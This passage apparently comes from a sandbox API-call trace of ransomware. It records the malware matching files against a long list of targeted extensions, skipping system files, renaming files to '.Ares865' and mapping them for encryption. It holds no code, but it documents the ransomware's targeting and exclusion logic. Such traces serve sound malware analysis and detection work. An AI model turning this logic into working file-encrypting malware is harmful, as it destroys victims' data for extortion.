lpString2="ns3") returned -1 [0084.965] lstrlenW (lpString="ns4") returned 3 [0084.965] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0084.965] lstrlenW (lpString="nsf") returned 3 [0084.965] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0084.965] lstrlenW (lpString="nv") returned 2 [0084.965] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0084.965] lstrlenW (lpString="nv2") returned 3 [0084.965] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0084.965] lstrlenW (lpString="nwdb") returned 4 [0084.965] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0084.965] lstrlenW (lpString="nyf") returned 3 [0084.965] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0084.965] lstrlenW (lpString="odb") returned 3 [0084.965] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.965] lstrlenW (lpString="odb") returned 3 [0084.965] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.965] lstrlenW (lpString="oqy") returned 3 [0084.965] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0084.965] lstrlenW (lpString="ora") returned 3 [0084.965] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0084.965] lstrlenW (lpString="orx") returned 3 [0084.965] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0084.965] lstrlenW (lpString="owc") returned 3 [0084.965] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0084.965] lstrlenW (lpString="p96") returned 3 [0084.965] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0084.965] lstrlenW (lpString="p97") returned 3 [0084.965] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0084.965] lstrlenW (lpString="pan") returned 3 [0084.965] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0084.966] lstrlenW (lpString="pdb") returned 3 [0084.966] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0084.966] lstrlenW (lpString="pdm") returned 3 [0084.966] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0084.966] lstrlenW (lpString="pnz") returned 3 [0084.966] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0084.966] lstrlenW (lpString="qry") returned 3 [0084.966] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0084.966] lstrlenW (lpString="qvd") returned 3 [0084.966] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0084.966] lstrlenW (lpString="rbf") returned 3 [0084.966] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0084.966] lstrlenW (lpString="rctd") returned 4 [0084.966] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0084.966] lstrlenW (lpString="rod") returned 3 [0084.966] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0084.966] lstrlenW (lpString="rodx") returned 4 [0084.966] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0084.966] lstrlenW (lpString="rpd") returned 3 [0084.966] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0084.966] lstrlenW (lpString="rsd") returned 3 [0084.966] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0084.966] lstrlenW (lpString="sas7bdat") returned 8 [0084.966] lstrcmpiW (lpString1="le25.bmp", lpString2="sas7bdat") returned -1 [0084.966] lstrlenW (lpString="sbf") returned 3 [0084.966] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0084.966] lstrlenW (lpString="scx") returned 3 [0084.966] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0084.966] lstrlenW (lpString="sdb") returned 3 [0084.966] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0084.966] lstrlenW (lpString="sdc") returned 3 [0084.966] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0084.966] lstrlenW (lpString="sdf") returned 3 [0084.966] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0084.966] lstrlenW (lpString="sis") returned 3 [0084.966] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0084.966] lstrlenW (lpString="spq") returned 3 [0084.966] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0084.967] lstrlenW (lpString="te") returned 2 [0084.967] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0084.967] lstrlenW (lpString="teacher") returned 7 [0084.967] lstrcmpiW (lpString1="e25.bmp", lpString2="teacher") returned -1 [0084.967] lstrlenW (lpString="tmd") returned 3 [0084.967] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0084.967] lstrlenW (lpString="tps") returned 3 [0084.967] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0084.967] lstrlenW (lpString="trc") returned 3 [0084.967] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.967] lstrlenW (lpString="trc") returned 3 [0084.967] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.967] lstrlenW (lpString="trm") returned 3 [0084.967] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0084.967] lstrlenW (lpString="udb") returned 3 [0084.967] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0084.967] lstrlenW (lpString="udl") returned 3 [0084.967] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0084.967] lstrlenW (lpString="usr") returned 3 [0084.967] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0084.967] lstrlenW (lpString="v12") returned 3 [0084.967] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0084.967] lstrlenW (lpString="vis") returned 3 [0084.967] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0084.967] lstrlenW (lpString="vpd") returned 3 [0084.967] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0084.967] lstrlenW (lpString="vvv") returned 3 [0084.967] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0084.967] lstrlenW (lpString="wdb") returned 3 [0084.967] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0084.967] lstrlenW (lpString="wmdb") returned 4 [0084.967] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0084.967] lstrlenW (lpString="wrk") returned 3 [0084.967] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0084.967] lstrlenW (lpString="xdb") returned 3 [0084.967] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0084.967] lstrlenW (lpString="xld") returned 3 [0084.968] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0084.968] lstrlenW (lpString="xmlff") returned 5 [0084.968] lstrcmpiW (lpString1="5.bmp", lpString2="xmlff") returned -1 [0084.968] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp.Ares865") returned 90 [0084.968] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile25.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile25.bmp.ares865"), dwFlags=0x1) returned 1 [0084.968] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile25.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0084.969] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0084.969] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0084.969] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0084.969] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0084.969] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0084.970] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0084.970] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.970] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0084.971] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0084.975] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0084.976] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0084.976] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.976] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0084.976] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0084.976] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0084.976] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0084.976] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0084.976] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0084.976] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0084.976] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0084.976] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0084.976] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0084.976] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0084.977] CloseHandle (hObject=0x15c) returned 1 [0084.977] CloseHandle (hObject=0x118) returned 1 [0084.977] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0084.977] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0084.977] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0084.977] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3f2373, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3f2373, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd27f263, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile26.bmp", cAlternateFileName="")) returned 1 [0084.977] lstrcmpiW (lpString1="usertile26.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0084.977] lstrcmpiW (lpString1="usertile26.bmp", lpString2="aoldtz.exe") returned 1 [0084.977] lstrcmpiW (lpString1="usertile26.bmp", lpString2=".") returned 1 [0084.977] lstrcmpiW (lpString1="usertile26.bmp", lpString2="..") returned 1 [0084.977] lstrcmpiW (lpString1="usertile26.bmp", lpString2="windows") returned -1 [0084.977] lstrcmpiW (lpString1="usertile26.bmp", lpString2="bootmgr") returned 1 [0084.977] lstrcmpiW (lpString1="usertile26.bmp", lpString2="temp") returned 1 [0084.977] lstrcmpiW (lpString1="usertile26.bmp", lpString2="pagefile.sys") returned 1 [0084.977] lstrcmpiW (lpString1="usertile26.bmp", lpString2="boot") returned 1 [0084.977] lstrcmpiW (lpString1="usertile26.bmp", lpString2="ids.txt") returned 1 [0084.977] lstrcmpiW (lpString1="usertile26.bmp", lpString2="ntuser.dat") returned 1 [0084.978] lstrcmpiW (lpString1="usertile26.bmp", lpString2="perflogs") returned 1 [0084.978] lstrcmpiW (lpString1="usertile26.bmp", lpString2="MSBuild") returned 1 [0084.978] lstrlenW (lpString="usertile26.bmp") returned 14 [0084.978] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp") returned 82 [0084.978] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile26.bmp" | out: lpString1="usertile26.bmp") returned="usertile26.bmp" [0084.978] lstrlenW (lpString="usertile26.bmp") returned 14 [0084.978] lstrlenW (lpString="Ares865") returned 7 [0084.978] lstrcmpiW (lpString1="e26.bmp", lpString2="Ares865") returned 1 [0084.978] lstrlenW (lpString=".dll") returned 4 [0084.978] lstrcmpiW (lpString1="usertile26.bmp", lpString2=".dll") returned 1 [0084.978] lstrlenW (lpString=".lnk") returned 4 [0084.978] lstrcmpiW (lpString1="usertile26.bmp", lpString2=".lnk") returned 1 [0084.978] lstrlenW (lpString=".ini") returned 4 [0084.978] lstrcmpiW (lpString1="usertile26.bmp", lpString2=".ini") returned 1 [0084.978] lstrlenW (lpString=".sys") returned 4 [0084.978] lstrcmpiW (lpString1="usertile26.bmp", lpString2=".sys") returned 1 [0084.978] lstrlenW (lpString="usertile26.bmp") returned 14 [0084.978] lstrlenW (lpString="bak") returned 3 [0084.978] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0084.978] lstrlenW (lpString="ba_") returned 3 [0084.978] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0084.978] lstrlenW (lpString="dbb") returned 3 [0084.978] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0084.978] lstrlenW (lpString="vmdk") returned 4 [0084.978] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0084.978] lstrlenW (lpString="rar") returned 3 [0084.978] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0084.978] lstrlenW (lpString="zip") returned 3 [0084.978] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0084.978] lstrlenW (lpString="tgz") returned 3 [0084.978] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0084.978] lstrlenW (lpString="vbox") returned 4 [0084.978] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0084.978] lstrlenW (lpString="vdi") returned 3 [0084.978] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0084.979] lstrlenW (lpString="vhd") returned 3 [0084.979] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0084.979] lstrlenW (lpString="vhdx") returned 4 [0084.979] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0084.979] lstrlenW (lpString="avhd") returned 4 [0084.979] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0084.979] lstrlenW (lpString="db") returned 2 [0084.979] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0084.979] lstrlenW (lpString="db2") returned 3 [0084.979] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0084.979] lstrlenW (lpString="db3") returned 3 [0084.979] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0084.979] lstrlenW (lpString="dbf") returned 3 [0084.979] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0084.979] lstrlenW (lpString="mdf") returned 3 [0084.979] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0084.979] lstrlenW (lpString="mdb") returned 3 [0084.979] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0084.979] lstrlenW (lpString="sql") returned 3 [0084.979] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0084.979] lstrlenW (lpString="sqlite") returned 6 [0084.979] lstrcmpiW (lpString1="26.bmp", lpString2="sqlite") returned -1 [0084.979] lstrlenW (lpString="sqlite3") returned 7 [0084.979] lstrcmpiW (lpString1="e26.bmp", lpString2="sqlite3") returned -1 [0084.979] lstrlenW (lpString="sqlitedb") returned 8 [0084.979] lstrcmpiW (lpString1="le26.bmp", lpString2="sqlitedb") returned -1 [0084.979] lstrlenW (lpString="xml") returned 3 [0084.979] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0084.979] lstrlenW (lpString="$er") returned 3 [0084.979] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0084.979] lstrlenW (lpString="4dd") returned 3 [0084.979] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0084.979] lstrlenW (lpString="4dl") returned 3 [0084.979] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0084.979] lstrlenW (lpString="^^^") returned 3 [0084.979] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0084.979] lstrlenW (lpString="abs") returned 3 [0084.979] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0084.980] lstrlenW (lpString="abx") returned 3 [0084.980] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0084.980] lstrlenW (lpString="accdb") returned 5 [0084.980] lstrcmpiW (lpString1="6.bmp", lpString2="accdb") returned -1 [0084.980] lstrlenW (lpString="accdc") returned 5 [0084.980] lstrcmpiW (lpString1="6.bmp", lpString2="accdc") returned -1 [0084.980] lstrlenW (lpString="accde") returned 5 [0084.980] lstrcmpiW (lpString1="6.bmp", lpString2="accde") returned -1 [0084.980] lstrlenW (lpString="accdr") returned 5 [0084.980] lstrcmpiW (lpString1="6.bmp", lpString2="accdr") returned -1 [0084.980] lstrlenW (lpString="accdt") returned 5 [0084.980] lstrcmpiW (lpString1="6.bmp", lpString2="accdt") returned -1 [0084.980] lstrlenW (lpString="accdw") returned 5 [0084.980] lstrcmpiW (lpString1="6.bmp", lpString2="accdw") returned -1 [0084.980] lstrlenW (lpString="accft") returned 5 [0084.980] lstrcmpiW (lpString1="6.bmp", lpString2="accft") returned -1 [0084.980] lstrlenW (lpString="adb") returned 3 [0084.980] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.980] lstrlenW (lpString="adb") returned 3 [0084.980] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.980] lstrlenW (lpString="ade") returned 3 [0084.980] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0084.980] lstrlenW (lpString="adf") returned 3 [0084.980] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0084.980] lstrlenW (lpString="adn") returned 3 [0084.980] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0084.980] lstrlenW (lpString="adp") returned 3 [0084.980] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0084.980] lstrlenW (lpString="alf") returned 3 [0084.980] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0084.980] lstrlenW (lpString="ask") returned 3 [0084.980] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0084.980] lstrlenW (lpString="btr") returned 3 [0084.980] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0084.980] lstrlenW (lpString="cat") returned 3 [0084.980] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0084.980] lstrlenW (lpString="cdb") returned 3 [0084.980] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0084.981] lstrlenW (lpString="ckp") returned 3 [0084.981] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0084.981] lstrlenW (lpString="cma") returned 3 [0084.981] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0084.981] lstrlenW (lpString="cpd") returned 3 [0084.981] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0084.981] lstrlenW (lpString="dacpac") returned 6 [0084.981] lstrcmpiW (lpString1="26.bmp", lpString2="dacpac") returned -1 [0084.981] lstrlenW (lpString="dad") returned 3 [0084.981] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0084.981] lstrlenW (lpString="dadiagrams") returned 10 [0084.981] lstrcmpiW (lpString1="tile26.bmp", lpString2="dadiagrams") returned 1 [0084.981] lstrlenW (lpString="daschema") returned 8 [0084.981] lstrcmpiW (lpString1="le26.bmp", lpString2="daschema") returned 1 [0084.981] lstrlenW (lpString="db-journal") returned 10 [0084.981] lstrcmpiW (lpString1="tile26.bmp", lpString2="db-journal") returned 1 [0084.981] lstrlenW (lpString="db-shm") returned 6 [0084.981] lstrcmpiW (lpString1="26.bmp", lpString2="db-shm") returned -1 [0084.981] lstrlenW (lpString="db-wal") returned 6 [0084.981] lstrcmpiW (lpString1="26.bmp", lpString2="db-wal") returned -1 [0084.981] lstrlenW (lpString="dbc") returned 3 [0084.981] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0084.981] lstrlenW (lpString="dbs") returned 3 [0084.981] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0084.981] lstrlenW (lpString="dbt") returned 3 [0084.981] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0084.981] lstrlenW (lpString="dbv") returned 3 [0084.981] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0084.981] lstrlenW (lpString="dbx") returned 3 [0084.981] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0084.981] lstrlenW (lpString="dcb") returned 3 [0084.981] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0084.981] lstrlenW (lpString="dct") returned 3 [0084.981] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0084.981] lstrlenW (lpString="dcx") returned 3 [0084.981] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0084.981] lstrlenW (lpString="ddl") returned 3 [0084.981] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0084.982] lstrlenW (lpString="dlis") returned 4 [0084.982] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0084.982] lstrlenW (lpString="dp1") returned 3 [0084.982] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0084.982] lstrlenW (lpString="dqy") returned 3 [0084.982] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0084.982] lstrlenW (lpString="dsk") returned 3 [0084.982] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0084.982] lstrlenW (lpString="dsn") returned 3 [0084.982] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0084.982] lstrlenW (lpString="dtsx") returned 4 [0084.982] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0084.982] lstrlenW (lpString="dxl") returned 3 [0084.982] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0084.982] lstrlenW (lpString="eco") returned 3 [0084.982] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0084.982] lstrlenW (lpString="ecx") returned 3 [0084.982] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0084.982] lstrlenW (lpString="edb") returned 3 [0084.982] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0084.982] lstrlenW (lpString="epim") returned 4 [0084.982] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0084.982] lstrlenW (lpString="fcd") returned 3 [0084.982] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0084.982] lstrlenW (lpString="fdb") returned 3 [0084.982] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0084.982] lstrlenW (lpString="fic") returned 3 [0084.982] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0084.982] lstrlenW (lpString="flexolibrary") returned 12 [0084.982] lstrcmpiW (lpString1="ertile26.bmp", lpString2="flexolibrary") returned -1 [0084.982] lstrlenW (lpString="fm5") returned 3 [0084.982] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0084.982] lstrlenW (lpString="fmp") returned 3 [0084.982] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0084.982] lstrlenW (lpString="fmp12") returned 5 [0084.982] lstrcmpiW (lpString1="6.bmp", lpString2="fmp12") returned -1 [0084.983] lstrlenW (lpString="fmpsl") returned 5 [0084.983] lstrcmpiW (lpString1="6.bmp", lpString2="fmpsl") returned -1 [0084.983] lstrlenW (lpString="fol") returned 3 [0084.983] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0084.983] lstrlenW (lpString="fp3") returned 3 [0084.983] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0084.983] lstrlenW (lpString="fp4") returned 3 [0084.983] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0084.983] lstrlenW (lpString="fp5") returned 3 [0084.983] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0084.983] lstrlenW (lpString="fp7") returned 3 [0084.983] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0084.983] lstrlenW (lpString="fpt") returned 3 [0084.983] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0084.983] lstrlenW (lpString="frm") returned 3 [0084.983] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0084.983] lstrlenW (lpString="gdb") returned 3 [0084.983] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.983] lstrlenW (lpString="gdb") returned 3 [0084.983] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.983] lstrlenW (lpString="grdb") returned 4 [0084.983] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0084.983] lstrlenW (lpString="gwi") returned 3 [0084.983] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0084.983] lstrlenW (lpString="hdb") returned 3 [0084.983] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0084.983] lstrlenW (lpString="his") returned 3 [0084.983] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0084.983] lstrlenW (lpString="ib") returned 2 [0084.983] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0084.983] lstrlenW (lpString="idb") returned 3 [0084.983] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0084.983] lstrlenW (lpString="ihx") returned 3 [0084.983] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0084.983] lstrlenW (lpString="itdb") returned 4 [0084.983] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0084.984] lstrlenW (lpString="itw") returned 3 [0084.984] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0084.984] lstrlenW (lpString="jet") returned 3 [0084.984] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0084.984] lstrlenW (lpString="jtx") returned 3 [0084.984] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0084.984] lstrlenW (lpString="kdb") returned 3 [0084.984] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0084.984] lstrlenW (lpString="kexi") returned 4 [0084.984] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0084.984] lstrlenW (lpString="kexic") returned 5 [0084.984] lstrcmpiW (lpString1="6.bmp", lpString2="kexic") returned -1 [0084.984] lstrlenW (lpString="kexis") returned 5 [0084.984] lstrcmpiW (lpString1="6.bmp", lpString2="kexis") returned -1 [0084.984] lstrlenW (lpString="lgc") returned 3 [0084.984] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0084.984] lstrlenW (lpString="lwx") returned 3 [0084.984] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0084.984] lstrlenW (lpString="maf") returned 3 [0084.984] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0084.984] lstrlenW (lpString="maq") returned 3 [0084.984] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0084.984] lstrlenW (lpString="mar") returned 3 [0084.984] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0084.984] lstrlenW (lpString="marshal") returned 7 [0084.984] lstrcmpiW (lpString1="e26.bmp", lpString2="marshal") returned -1 [0084.984] lstrlenW (lpString="mas") returned 3 [0084.984] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0084.984] lstrlenW (lpString="mav") returned 3 [0084.984] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0084.984] lstrlenW (lpString="maw") returned 3 [0084.984] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0084.984] lstrlenW (lpString="mdbhtml") returned 7 [0084.984] lstrcmpiW (lpString1="e26.bmp", lpString2="mdbhtml") returned -1 [0084.984] lstrlenW (lpString="mdn") returned 3 [0084.984] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0084.984] lstrlenW 